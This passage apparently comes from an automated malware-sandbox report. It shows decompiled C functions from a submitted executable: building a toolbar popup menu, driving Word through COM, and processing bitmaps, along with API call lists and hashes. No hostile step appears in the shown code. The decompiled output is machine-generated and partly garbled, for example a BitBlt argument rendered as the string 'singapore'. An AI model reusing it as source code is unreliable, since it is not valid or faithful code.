      									E009FAFE6(_t402 - 0x118,  *(_t402 - 0xf0) -  *(_t402 - 0xe8), 0xffffffff);
      									E009BC092(0, _t402 - 0x150, _t392, _t396, CreatePopupMenu());
      									E009BAD44(0, _t402 - 0x140, _t392, _t396, CreateCompatibleDC( *(_t402 - 0x160)));
      									_t398 = 0;
      									while(1) {
      										__eflags =  *(_t402 - 0xe8) -  *(_t402 - 0xf0);
      										if(__eflags >= 0) {
      											break;
      										}
      										E009C2610( *(_t402 - 0x104), _t392, __eflags,  *(_t402 - 0xe8), _t402 - 0x11c, _t402 - 0x12c, _t402 - 0x120);
      										__eflags =  *(_t402 - 0x12c) & 0x00000001;
      										if(( *(_t402 - 0x12c) & 0x00000001) != 0) {
      											__eflags = _t398;
      											if(_t398 != 0) {
      												 *((intOrPtr*)(_t402 - 0x190)) = 0x100;
      												 *((intOrPtr*)(_t402 - 0x18c)) = 0x800;
      												goto L42;
      											}
      											goto L43;
      										} else {
      											_t395 =  *(_t402 - 0x11c);
      											_push( *(_t402 - 0x11c));
      											 *((intOrPtr*)(_t402 - 0x190)) = 0x162;
      											_t274 = E009BE51C();
      											__eflags = _t274;
      											if(_t274 == 0) {
      												L18:
      												E009A5DC0(_t402 - 0xf4);
      											} else {
      												_t312 = E009A8DDD(_t402 - 0xfc, _t392, _t274, _t395);
      												__eflags = _t312;
      												if(_t312 == 0) {
      													goto L18;
      												} else {
      													E009BE527(0, _t402 - 0xf4,  *((intOrPtr*)(_t402 - 0xfc)), 1, 0xa);
      												}
      											}
      											_t276 = E009A6291(__eflags, 8);
      											__eflags = _t276;
      											if(_t276 == 0) {
      												_t276 = 0;
      												__eflags = 0;
      											} else {
      												 *((intOrPtr*)(_t276 + 4)) = 0;
      												 *_t276 = 0xad7e64;
      											}
      											E009FB10C(_t402 - 0x118, _t398, _t276);
      											_t278 =  *(_t402 - 0xf8);
      											__eflags = _t278;
      											if(__eflags == 0) {
      												L38:
      												 *(_t402 - 0x174) = 0;
      												goto L39;
      											} else {
      												_push(_t402 - 0x80);
      												_push( *((intOrPtr*)(_t402 - 0x120)));
      												_push( *((intOrPtr*)(_t278 + 4)));
      												_t284 = E009A8647(0,  *((intOrPtr*)( *((intOrPtr*)(E009BD77F(0, _t395, _t398, __eflags) + 0x78)))), _t395, _t398, __eflags);
      												__eflags = _t284;
      												if(_t284 == 0) {
      													goto L38;
      												} else {
      													CopyRect(_t402 - 0x30, _t402 - 0x70);
      													_t372 =  ~( *(_t402 - 0x30));
      													OffsetRect(_t402 - 0x30,  ~( *(_t402 - 0x30)),  ~( *(_t402 - 0x2c)));
      													__eflags = _t398;
      													if(__eflags < 0) {
      														L52:
      														E009B8782(_t372);
      														goto L53;
      													} else {
      														__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      														if(__eflags >= 0) {
      															goto L52;
      														} else {
      															_t395 = _t398;
      															 *(_t402 - 0x128) =  *( *(_t402 - 0x114) + _t395 * 4);
      															_t295 = CreateCompatibleBitmap( *(_t402 - 0x160),  *(_t402 - 0x28),  *(_t402 - 0x24));
      															_t372 =  *(_t402 - 0x128);
      															E009BB018(0,  *(_t402 - 0x128), _t392, _t395, _t295);
      															__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      															if(__eflags >= 0) {
      																goto L52;
      															} else {
      																_t298 =  *( *(_t402 - 0x114) + _t395 * 4);
      																__eflags = _t298;
      																if(_t298 != 0) {
      																	_t299 =  *((intOrPtr*)(_t298 + 4));
      																} else {
      																	_t299 = 0;
      																}
      																_t300 = E009BB0A9( *((intOrPtr*)(_t402 - 0x13c)), _t299);
      																__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      																if(__eflags >= 0) {
      																	goto L52;
      																} else {
      																	 *( *(_t402 - 0x114) + _t395 * 4) = _t300;
      																	_t301 = GetSysColor(4);
      																	_t372 = _t402 - 0x140;
      																	E009C1FF9(_t402 - 0x140, _t402 - 0x30, _t301);
      																	E009A86F4(_t402 - 0x140,  *((intOrPtr*)( *(_t402 - 0xf8) + 4)),  *((intOrPtr*)(_t402 - 0x120)),  *((intOrPtr*)(_t402 - 0x13c)), 0, 0, 1);
      																	__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      																	if(__eflags >= 0) {
      																		goto L52;
      																	} else {
      																		_t307 =  *( *(_t402 - 0x114) + _t395 * 4);
      																		__eflags = _t307;
      																		if(_t307 != 0) {
      																			_t308 =  *((intOrPtr*)(_t307 + 4));
      																		} else {
      																			_t308 = 0;
      																		}
      																		_t309 = E009BB0A9( *((intOrPtr*)(_t402 - 0x13c)), _t308);
      																		__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      																		if(__eflags >= 0) {
      																			goto L52;
      																		} else {
      																			_t372 =  *(_t402 - 0x114);
      																			 *( *(_t402 - 0x114) + _t395 * 4) = _t309;
      																			__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
      																			if(__eflags >= 0) {
      																				goto L52;
      																			} else {
      																				 *(_t402 - 0x174) =  *( *(_t402 - 0x114) + _t395 * 4);
      																				L39:
      																				 *((intOrPtr*)(_t402 - 0x170)) =  *((intOrPtr*)(_t402 - 0xf4));
      																				 *(_t402 - 0x184) =  *(_t402 - 0x11c);
      																				 *((intOrPtr*)(_t402 - 0x18c)) = 0x100;
      																				_t398 = _t398 + 1;
      																				L42:
      																				InsertMenuItemA( *(_t402 - 0x14c),  *(_t402 - 0xe8), 1, _t402 - 0x194);
      																				L43:
      																				_t165 = _t402 - 0xe8;
      																				 *_t165 =  *(_t402 - 0xe8) + 1;
      																				__eflags =  *_t165;
      																				continue;
      																			}
      																		}
      																	}
      																}
      															}
      														}
      													}
      												}
      											}
      										}
      										goto L55;
      									}
      									CopyRect(_t402 - 0x60,  *(_t402 - 0x130));
      									E009BAAE4( *((intOrPtr*)(_t402 - 0x100)), _t402 - 0x60);
      									_t372 = _t402 - 0x150;
      									E009ABA60(_t402 - 0x150, __eflags, 0,  *(_t402 - 0x60),  *((intOrPtr*)(_t402 - 0x54)),  *((intOrPtr*)(_t402 - 0x100)), 0);
      									_t395 = 0;
      									 *((intOrPtr*)( *((intOrPtr*)(_t402 - 0x124)))) = 0;
      									__eflags = _t398;
      									if(__eflags <= 0) {
      										L51:
      										 *((char*)(_t402 - 4)) = 5;
      										E009BBED6(_t402 - 0x118);
      										 *((char*)(_t402 - 4)) = 4;
      										E009BAE32(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
      										 *((char*)(_t402 - 4)) = 3;
      										E009BADC5(_t402 - 0x140);
      										E009A5510( *((intOrPtr*)(_t402 - 0xf4)) + 0xfffffff0, _t392);
      										E009A5510( *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0, _t392);
      										 *((char*)(_t402 - 4)) = 0;
      										E009A9488(0, _t402 - 0x150, _t395, _t398, __eflags);
      										_t398 = 1;
      										goto L6;
      									} else {
      										while(1) {
      											__eflags = _t395;
      											if(__eflags < 0) {
      												goto L52;
      											}
      											__eflags = _t395 -  *((intOrPtr*)(_t402 - 0x110));
      											if(__eflags >= 0) {
      												goto L52;
      											} else {
      												_t372 =  *( *(_t402 - 0x114) + _t395 * 4);
      												__eflags = _t372;
      												if(_t372 != 0) {
      													 *((intOrPtr*)( *_t372 + 4))(1);
      												}
      												_t395 = _t395 + 1;
      												__eflags = _t395 - _t398;
      												if(__eflags < 0) {
      													continue;
      												} else {
      													goto L51;
      												}
      											}
      											goto L55;
      										}
      										goto L52;
      									}
      								}
      							}
      						}
      					} else {
      						_t410 =  *((intOrPtr*)(_t402 - 0x100)) - _t217;
      						if( *((intOrPtr*)(_t402 - 0x100)) == _t217) {
      							goto L7;
      						} else {
      							_t398 = E009A96B5(0, _t217, _t392, _t395, _t398, _t410,  *((intOrPtr*)(_t402 + 8)), _t398,  *((intOrPtr*)(_t402 - 0x124)));
      							L6:
      							E009A5510( *((intOrPtr*)(_t402 - 0xec)) + 0xfffffff0, _t392);
      						}
      					}
      				}
      				L55:
      				return E00AAD31E(0, _t395, _t398);
      			}

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A96BF
      • lstrlenA.KERNEL32(ReBarWindow32,00000000,00000188), ref: 009A96F1
      • GetClassNameA.USER32(?,00000000,00000001), ref: 009A970A
        • Part of subcall function 009A876D: _strnlen.LIBCMT ref: 009A8788
      • SendMessageA.USER32 ref: 009A984B
      • SendMessageA.USER32 ref: 009A9863
      • lstrlenA.KERNEL32(ToolbarWindow32), ref: 009A986A
      • GetClassNameA.USER32(?,00000000,?), ref: 009A9890
      • SendMessageA.USER32 ref: 009A9924
      • SendMessageA.USER32 ref: 009A994A
      • IntersectRect.USER32 ref: 009A9958
      • _memset.LIBCMT ref: 009A9976
      • CreatePopupMenu.USER32(?,000000FF), ref: 009A99C4
      • CreateCompatibleDC.GDI32(?), ref: 009A99DC
      • CopyRect.USER32 ref: 009A9AD7
      • OffsetRect.USER32(?,?,?), ref: 009A9AED
      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 009A9B24
      • GetSysColor.USER32(00000004), ref: 009A9B79
      • InsertMenuItemA.USER32(?,?,00000001,?), ref: 009A9C63
      • CopyRect.USER32 ref: 009A9C8B
      Strings
      Yara matches
      Similarity
      • API ID: MessageRectSend$Create$ClassCompatibleCopyMenuNamelstrlen$BitmapColorH_prolog3_InsertIntersectItemOffsetPopup_memset_strnlen
      • String ID: ReBarWindow32$ToolbarWindow32
      • API String ID: 1783801815-2283011909
      • Opcode ID: 0ecbe6bdf426420eeca42443f52f86f99f1ebf69f76114c55699551ee43dea71
      • Instruction ID: fd01f606dc73447466f78d8adc1ddcb56f6ca53c3626ba14e6ed45cb0c76f485
      • Opcode Fuzzy Hash: 0ecbe6bdf426420eeca42443f52f86f99f1ebf69f76114c55699551ee43dea71
      • Instruction Fuzzy Hash: BF1218719001299BCF25EFA4CD85BEDB7B9BF49300F0045D9E60AA7291DB309E85CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 28%
      			E009A41D0(void* __ecx, char* __edx, intOrPtr _a4) {
      				signed int _v8;
      				char _v24;
      				intOrPtr _v28;
      				short _v32;
      				intOrPtr _v36;
      				char _v40;
      				char _v44;
      				intOrPtr _v52;
      				char _v60;
      				intOrPtr _v64;
      				intOrPtr _v72;
      				char _v80;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t55;
      				intOrPtr _t57;
      				char* _t58;
      				intOrPtr* _t61;
      				intOrPtr* _t84;
      				void* _t89;
      				intOrPtr* _t104;
      				void* _t127;
      				intOrPtr* _t128;
      				void* _t129;
      				signed int _t130;
      				void* _t131;
      				intOrPtr* _t132;
      				intOrPtr* _t139;
      
      				_t111 = __edx;
      				_t55 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t55 ^ _t130;
      				_t57 = _a4;
      				_t129 = __ecx;
      				_v64 = _t57;
      				__imp__CoInitialize(0);
      				__imp__CLSIDFromProgID(L"Word.Application",  &_v24);
      				if(_t57 >= 0) {
      					_t111 =  &_v44;
      					_t58 =  &_v24;
      					_v44 = 0;
      					__imp__CoCreateInstance(_t58, 0, 4, 0xad89ac,  &_v44);
      					if(_t58 < 0) {
      						goto L1;
      					} else {
      						_t132 = _t131 - 0x10;
      						_t61 = _t132;
      						_v40 = 3;
      						 *_t61 = _v40;
      						 *((intOrPtr*)(_t61 + 4)) = _v36;
      						 *((intOrPtr*)(_t61 + 8)) = 1;
      						 *((intOrPtr*)(_t61 + 0xc)) = _v28;
      						E009A4050();
      						_t128 = __imp__#8;
      						 *_t128(0, _v44, L"Visible", 1);
      						E009A4050(_t129, 2,  &_v60, _v44, L"Documents", 0,  &_v60);
      						 *_t128();
      						E009A4050(_t129, 1,  &_v40, _v52, L"Add", 0,  &_v40);
      						 *_t128();
      						E009A4050(_t129, 2,  &_v60, _v32, L"Paragraphs", 0,  &_v60);
      						 *_t128();
      						E009A4050(_t129, 1,  &_v40, _v52, L"Add", 0,  &_v40);
      						 *_t128();
      						E009A4050(_t129, 2,  &_v60, _v32, L"Range", 0,  &_v60);
      						_t90 = _v52;
      						_v40 = 8;
      						__imp__#2();
      						_t139 = _t132 + 0xa0 - 0x10;
      						_t104 = _t139;
      						 *_t104 = _v40;
      						 *((intOrPtr*)(_t104 + 4)) = _v36;
      						 *((intOrPtr*)(_t104 + 8)) = 8;
      						_v32 = 8;
      						 *((intOrPtr*)(_t104 + 0xc)) = _v28;
      						E009A4050(_t129, 4, 0, _v52, L"Text", 1, _v64);
      						__imp__#9();
      						 *_t128();
      						E009A4050(_t129, 2,  &_v80, _v52, L"Font", 0,  &_v80);
      						_t84 = _t139 + 0x30;
      						_v40 = 3;
      						 *_t84 = _v40;
      						 *((intOrPtr*)(_t84 + 4)) = _v36;
      						 *((intOrPtr*)(_t84 + 8)) = 1;
      						 *((intOrPtr*)(_t84 + 0xc)) = _v28;
      						E009A4050(_t129, 4, 0, _v72, L"Bold", 1,  &_v40);
      						E009A4050(_t129, 1, 0, _t90, L"InsertParagraphAfter", 0, __ecx);
      						return E00AAB46A(0, _t90, _v8 ^ _t130, _v72, _t128, _t129, 4);
      					}
      				} else {
      					L1:
      					return E00AAB46A(1, _t89, _v8 ^ _t130, _t111, _t127, _t129);
      				}
			}

      0x009a41d0
      0x009a41d6
      0x009a41dd
      0x009a41e0
      0x009a41e8
      0x009a41ea
      0x009a41ed
      0x009a41fc
      0x009a4204
      0x009a421b
      0x009a4228
      0x009a422c
      0x009a4233
      0x009a423b
      0x00000000
      0x009a423d
      0x009a423d
      0x009a4240
      0x009a4247
      0x009a424e
      0x009a4255
      0x009a4268
      0x009a4271
      0x009a4274
      0x009a4279
      0x009a4286
      0x009a429a
      0x009a42a6
      0x009a42ba
      0x009a42c6
      0x009a42da
      0x009a42e6
      0x009a42fa
      0x009a4306
      0x009a431a
      0x009a4322
      0x009a432e
      0x009a4332
      0x009a433b
      0x009a433e
      0x009a4340
      0x009a4345
      0x009a4348
      0x009a434d
      0x009a4358
      0x009a4363
      0x009a436f
      0x009a4379
      0x009a438a
      0x009a4392
      0x009a439c
      0x009a43a3
      0x009a43aa
      0x009a43b8
      0x009a43c1
      0x009a43c4
      0x009a43d6
      0x009a43f0
      0x009a43f0
      0x009a4206
      0x009a4206
      0x009a4218
      0x009a4218

      APIs
      • CoInitialize.OLE32(00000000), ref: 009A41ED
      • CLSIDFromProgID.OLE32(Word.Application,?), ref: 009A41FC
      • CoCreateInstance.OLE32(?,00000000,00000004,00AD89AC,?), ref: 009A4233
      • VariantInit.OLEAUT32(?), ref: 009A4286
      • VariantInit.OLEAUT32(?), ref: 009A42A6
      • VariantInit.OLEAUT32(?), ref: 009A42C6
      • VariantInit.OLEAUT32(?), ref: 009A42E6
      • VariantInit.OLEAUT32(?), ref: 009A4306
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InitVariant$CreateFromInitializeInstanceProg
      • String ID: Add$Bold$Documents$Font$InsertParagraphAfter$Paragraphs$Range$Text$Visible$Word.Application
      • API String ID: 3550150379-2794334559
      • Opcode ID: 93bd4d7b8987a1834f2f671c95f5fe302e0c7737aa4184cc4d6d6dfc2d248adc
      • Instruction ID: 8eb0012924c4ad41c0dd95bfd8262deb3f849c1fe3511fb92bce222c7a2e6e9d
      • Opcode Fuzzy Hash: 93bd4d7b8987a1834f2f671c95f5fe302e0c7737aa4184cc4d6d6dfc2d248adc
      • Instruction Fuzzy Hash: EE617871A40208BBDB14EF94DC56FDEB7B8EF88700F10845AF605BB2D1E7B169058BA5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E00A37EA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
      				void* _t149;
      				signed int _t155;
      				void* _t158;
      				void* _t159;
      				unsigned int _t161;
      				intOrPtr _t164;
      				void* _t165;
      				signed int _t175;
      				intOrPtr _t177;
      				void* _t186;
      				signed char _t188;
      				signed int _t200;
      				void* _t209;
      				signed int _t217;
      				short _t240;
      				int _t247;
      				signed char* _t250;
      				void* _t251;
      				long long* _t252;
      				signed long long _t259;
      				signed long long _t263;
      
      				_t259 = __fp0;
      				_t244 = __edi;
      				_t237 = __edx;
      				_push(0xfc);
      				E00AAD29B(0xace3ca, __ebx, __edi, __esi);
      				_t209 = __ecx;
      				_t247 = 0;
      				 *((intOrPtr*)(__ecx + 0x2c)) = 1;
      				 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(_t251 + 8));
      				if( *((intOrPtr*)(__ecx + 0x88)) == 0 ||  *0xd0ff5c <= 8) {
      					L4:
      					return E00AAD31E(_t209, _t244, _t247);
      				} else {
      					E009BA639(_t251 - 0xb8);
      					 *(_t251 - 4) = 0;
      					E009BAD44(__ecx, _t251 - 0xb8, __edx, __edi, CreateCompatibleDC(0));
      					if(GetObjectA( *(_t209 + 0x88), 0x18, _t251 - 0x108) != 0) {
      						_t244 = SelectObject;
      						 *(_t251 - 0x94) =  *(_t251 - 0x104);
      						 *(_t251 - 0xa4) =  *(_t251 - 0x100);
      						_t149 =  *(_t209 + 0x88);
      						__eflags = _t149;
      						if(_t149 == 0) {
      							 *(_t251 - 0x9c) = 0;
      						} else {
      							 *(_t251 - 0x9c) = SelectObject( *(_t251 - 0xb4), _t149);
      						}
      						__eflags =  *(_t251 - 0x9c) - _t247;
      						if( *(_t251 - 0x9c) == _t247) {
      							goto L3;
      						} else {
      							E009BA639(_t251 - 0xc8);
      							 *(_t251 - 4) = 1;
      							E009BAD44(_t209, _t251 - 0xc8, _t237, _t244, CreateCompatibleDC( *(_t251 - 0xb4)));
      							_t155 =  *(_t251 - 0x94);
      							_t217 =  *(_t251 - 0xa4);
      							 *((short*)(_t251 - 0x30)) = 1;
      							_t240 = 0x20;
      							 *(_t251 - 0x38) = _t155;
      							 *(_t251 - 0x34) = _t217;
      							 *(_t251 - 0x3c) = 0x28;
      							 *((short*)(_t251 - 0x2e)) = _t240;
      							 *(_t251 - 0x2c) = _t247;
      							 *(_t251 - 0x28) = _t217 * _t155;
      							 *(_t251 - 0x24) = _t247;
      							 *(_t251 - 0x20) = _t247;
      							 *(_t251 - 0x1c) = _t247;
      							 *(_t251 - 0x18) = _t247;
      							 *(_t251 - 0xd4) = _t247;
      							_t158 = CreateDIBSection( *(_t251 - 0xc4), _t251 - 0x3c, _t247, _t251 - 0xd4, _t247, _t247);
      							 *(_t251 - 0xa0) = _t158;
      							__eflags = _t158 - _t247;
      							if(_t158 != _t247) {
      								_t159 = SelectObject( *(_t251 - 0xc4), _t158);
      								 *(_t251 - 0xd8) = _t159;
      								__eflags = _t159 - _t247;
      								if(_t159 != _t247) {
      									BitBlt( *(_t251 - 0xc4), _t247, _t247,  *(_t251 - 0x94),  *(_t251 - 0xa4),  *(_t251 - 0xb4), _t247, _t247, "singapore");
      									_t161 =  *(_t209 + 0xc);
      									 *(_t251 - 0x98) = 0x82;
      									__eflags = _t161 - _t247;
      									if(_t161 > _t247) {
      										 *(_t251 - 0x98) = _t161;
      									}
      									__eflags =  *((intOrPtr*)(_t209 + 8)) - 0x20;
      									if( *((intOrPtr*)(_t209 + 8)) != 0x20) {
      										E00A52C9F(_t251 - 0xd0, _t251 - 0xc8);
      										_t164 =  *((intOrPtr*)(_t209 + 0xa4));
      										 *(_t251 - 4) = 2;
      										__eflags = _t164 - 0xffffffff;
      										if(__eflags == 0) {
      											_t164 =  *0xd0fdc4; // 0xf0f0f0
      										}
      										_push(0xffffffff);
      										_push(_t164);
      										_push( *(_t251 - 0x98));
      										 *(_t251 - 0xe0) =  *(_t251 - 0x94);
      										 *(_t251 - 0xe8) = _t247;
      										 *(_t251 - 0xe4) = _t247;
      										 *(_t251 - 0xdc) =  *(_t251 - 0xa4);
      										asm("movsd");
      										asm("movsd");
      										asm("movsd");
      										asm("movsd");
      										_t165 = L00A54073(_t209, _t251 - 0xd0, _t240, _t252 - 0x10, _t251 - 0xe8, __eflags, _t259);
      										 *(_t251 - 4) = 1;
      										L00A52CB6(_t165, _t251 - 0xd0);
      										_t244 = SelectObject;
      										goto L28;
      									} else {
      										_t175 = GetObjectA( *(_t251 - 0xa0), 0x54, _t251 - 0x90);
      										__eflags = _t175;
      										if(_t175 == 0) {
      											L11:
      											 *(_t251 - 4) = 0;
      											E009BADC5(_t251 - 0xc8);
      											goto L3;
      										}
      										__eflags =  *((short*)(_t251 - 0x7e)) - 0x20;
      										if( *((short*)(_t251 - 0x7e)) != 0x20) {
      											goto L11;
      										}
      										_t177 =  *((intOrPtr*)(_t251 - 0x7c));
      										__eflags = _t177 - _t247;
      										if(_t177 != _t247) {
      											 *(_t251 - 0x94) = _t247;
      											__eflags =  *(_t251 - 0x88) *  *(_t251 - 0x8c);
      											if( *(_t251 - 0x88) *  *(_t251 - 0x8c) <= 0) {
      												L28:
      												SelectObject( *(_t251 - 0xc4),  *(_t251 - 0xd8));
      												SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
      												DeleteObject( *(_t209 + 0x88));
      												 *(_t209 + 0x88) =  *(_t251 - 0xa0);
      												_t247 = 1;
      												goto L20;
      											}
      											asm("fild dword [ebp-0x98]");
      											_t250 = _t177 + 1;
      											 *(_t251 - 0xa8) = _t259 *  *0xae8828;
      											do {
      												_t186 = L00A531D3((( *(_t250 - 1) & 0x000000ff) << 0x00000008 |  *_t250 & 0x000000ff) << 0x00000008 | _t250[1] & 0x000000ff, _t251 - 0xf0, _t251 - 0xe0, _t251 - 0xd0);
      												_t252 = _t252 - 0x30;
      												 *(_t252 + 0x28) =  *(_t251 - 0xa8);
      												 *(_t252 + 0x20) =  *(_t251 - 0xa8);
      												_t263 =  *(_t251 - 0xa8);
      												 *(_t252 + 0x18) = _t263;
      												asm("fldz");
      												 *(_t252 + 0x10) = _t263;
      												 *((long long*)(_t252 + 8)) =  *((long long*)(_t251 - 0xd0));
      												 *_t252 =  *((long long*)(_t251 - 0xf0));
      												_push(L00A52FA7(_t186));
      												_t188 = E00A52D86(_t250[1] & 0x000000ff);
      												 *(_t251 - 0x98) = _t188;
      												asm("cdq");
      												_t250[1] = (_t188 & 0x000000ff) * (_t250[2] & 0x000000ff) / 0xff;
      												asm("cdq");
      												 *_t250 = ( *(_t251 - 0x98) >> 0x00000008 & 0x000000ff) * (_t250[2] & 0x000000ff) / 0xff;
      												_t200 = ( *(_t251 - 0x98) >> 0x00000010 & 0x000000ff) * (_t250[2] & 0x000000ff);
      												asm("cdq");
      												 *(_t251 - 0x94) =  *(_t251 - 0x94) + 1;
      												_t250 =  &(_t250[4]);
      												 *((char*)(_t250 - 5)) = _t200 / 0xff;
      												__eflags =  *(_t251 - 0x94) -  *(_t251 - 0x88) *  *(_t251 - 0x8c);
      											} while ( *(_t251 - 0x94) <  *(_t251 - 0x88) *  *(_t251 - 0x8c));
      											goto L28;
      										}
      										L20:
      										 *(_t251 - 4) = 0;
      										E009BADC5(_t251 - 0xc8);
      										 *(_t251 - 4) =  *(_t251 - 4) | 0xffffffff;
      										E009BADC5(_t251 - 0xb8);
      										goto L4;
      									}
      								}
      								SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
      								DeleteObject( *(_t251 - 0xa0));
      								goto L11;
      							}
      							SelectObject( *(_t251 - 0xb4),  *(_t251 - 0x9c));
      							goto L11;
      						}
      					}
      					L3:
      					 *(_t251 - 4) =  *(_t251 - 4) | 0xffffffff;
      					E009BADC5(_t251 - 0xb8);
      					goto L4;
      				}
			}

      0x00a37ea2
      0x00a37ea2
      0x00a37ea2
      0x00a37ea2
      0x00a37eac
      0x00a37eb1
      0x00a37eb9
      0x00a37ebb
      0x00a37ebe
      0x00a37ec7
      0x00a37f1d
      0x00a37f22
      0x00a37ed2
      0x00a37ed8
      0x00a37ede
      0x00a37eee
      0x00a37f0a
      0x00a37f2b
      0x00a37f31
      0x00a37f3d
      0x00a37f43
      0x00a37f49
      0x00a37f4b
      0x00a37f5e
      0x00a37f4d
      0x00a37f56
      0x00a37f56
      0x00a37f64
      0x00a37f6a
      0x00000000
      0x00a37f6c
      0x00a37f72
      0x00a37f7d
      0x00a37f8e
      0x00a37f93
      0x00a37f99
      0x00a37fa4
      0x00a37fa8
      0x00a37fab
      0x00a37fae
      0x00a37fc6
      0x00a37fcd
      0x00a37fd1
      0x00a37fd4
      0x00a37fd7
      0x00a37fda
      0x00a37fdd
      0x00a37fe0
      0x00a37fe3
      0x00a37fe9
      0x00a37fef
      0x00a37ff5
      0x00a37ff7
      0x00a38022
      0x00a38024
      0x00a3802a
      0x00a3802c
      0x00a3806b
      0x00a38071
      0x00a38074
      0x00a3807e
      0x00a38080
      0x00a38082
      0x00a38082
      0x00a38088
      0x00a3808c
      0x00a38215
      0x00a3821a
      0x00a38220
      0x00a38224
      0x00a38227
      0x00a38229
      0x00a38229
      0x00a38234
      0x00a38236
      0x00a38237
      0x00a3823d
      0x00a38249
      0x00a3824f
      0x00a38255
      0x00a38266
      0x00a38267
      0x00a38268
      0x00a3826f
      0x00a38270
      0x00a3827b
      0x00a3827f
      0x00a38284
      0x00000000
      0x00a38092
      0x00a380a1
      0x00a380a7
      0x00a380a9
      0x00a38007
      0x00a3800d
      0x00a38011
      0x00000000
      0x00a38011
      0x00a380af
      0x00a380b4
      0x00000000
      0x00000000
      0x00a380ba
      0x00a380bd
      0x00a380bf
      0x00a380f3
      0x00a380f9
      0x00a380fb
      0x00a3828a
      0x00a38296
      0x00a382a4
      0x00a382ac
      0x00a382ba
      0x00a382c0
      0x00000000
      0x00a382c0
      0x00a38101
      0x00a38107
      0x00a38110
      0x00a38116
      0x00a38141
      0x00a38146
      0x00a3814f
      0x00a38159
      0x00a3815d
      0x00a38163
      0x00a38167
      0x00a38169
      0x00a38173
      0x00a3817d
      0x00a38185
      0x00a38186
      0x00a3818f
      0x00a3819b
      0x00a381a7
      0x00a381b9
      0x00a381c5
      0x00a381d3
      0x00a381d6
      0x00a381de
      0x00a381e4
      0x00a381e7
      0x00a381f7
      0x00a381f7
      0x00000000
      0x00a38203
      0x00a380c1
      0x00a380c7
      0x00a380cb
      0x00a380d0
      0x00a380da
      0x00000000
      0x00a380df
      0x00a3808c
      0x00a3803a
      0x00a38042
      0x00000000
      0x00a38042
      0x00a38005
      0x00000000
      0x00a38005
      0x00a37f6a
      0x00a37f0c
      0x00a37f0c
      0x00a37f16
      0x00000000
      0x00a37f1b

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 00A37EAC
      • CreateCompatibleDC.GDI32(00000000), ref: 00A37EE1
      • GetObjectA.GDI32(?,00000018,?), ref: 00A37F02
      • SelectObject.GDI32(?,?), ref: 00A37F54
      • CreateCompatibleDC.GDI32(?), ref: 00A37F81
      • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00A37FE9
      • SelectObject.GDI32(?,?), ref: 00A38005
      • SelectObject.GDI32(?,00000000), ref: 00A38022
      • SelectObject.GDI32(?,?), ref: 00A3803A
      • DeleteObject.GDI32(?), ref: 00A38042
      • BitBlt.GDI32(?,00000000,00000000,?,000000FF,?,00000000,00000000,singapore), ref: 00A3806B
      • GetObjectA.GDI32(?,00000054,?), ref: 00A380A1
      • SelectObject.GDI32(?,?), ref: 00A38296
      • SelectObject.GDI32(?,?), ref: 00A382A4
      • DeleteObject.GDI32(?), ref: 00A382AC
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Object$Select$Create$CompatibleDelete$H_prolog3_Section
      • String ID: $($singapore
